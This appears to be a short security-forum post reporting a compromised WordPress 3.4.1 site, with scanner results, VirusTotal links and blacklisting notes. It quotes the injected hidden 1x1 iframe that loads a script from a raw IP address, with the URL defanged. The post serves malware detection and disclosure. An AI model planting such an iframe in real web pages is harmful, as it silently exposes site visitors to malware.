iFrame found

See: http://killmalware.com/clineagency.com/
iframe name=twitter scrolling=auto frameborder=no align=center height=1 width=1 src=htXp://176.31.24.102/post.php?id=2938324308>
IP badness history: https://www.virustotal.com/nl/ip-address/176.31.24.102/information/
Why? Re: http://ninjafirewall.com/malware/?threat=2014-01-20.01
See: https://www.virustotal.com/nl/url/cc7f310ae20c2ca8a4666dd6f7ccace1d74b413e8bbc8d930d8eac58cbcf07f9/analysis/
ISSUE DETECTED DEFINITION INFECTED URL
SEO Spam MW:SPAM:SEO htxp://clineagency.com
Website Malware MW:BLK:2 httx://clineagency.com Web application details:
Application: WordPress 3.4.1 - http://www.wordpress.org
Running cPanel 11.42.1.25: clineagency.com:2082

Web application version:
WordPress version: WordPress 3.4.1
Wordpress version from source: 3.4.1
Wordpress Version 3.3 or 3.4 based on: htxp://clineagency.com/wp-includes/js/autosave.js
WordPress theme: htxp://clineagency.com/wp-content/themes/twentyeleven/
WordPress version outdated: Upgrade required.
Outdated WordPress Found: WordPress Under 3.9.1

Site is Google Safebrowsing Blacklisted

pol

VirusTotal
https://www.virustotal.com/nb/file/ae7da61e5fd69663f52ce43575d380d0568603a74a7f35cf860ddba5dcbfa6b1/analysis/1408027810/
https://www.virustotal.com/nb/file/a1da4b427dc6ea91259a74873eb22e6ebda2debe4fd65aaa2928fe028080008c/analysis/1408027826/

Hi Pondus,

Seems we are being protected,

pol

More blacklisting: http://sitecheck.sucuri.net/results/clineagency.com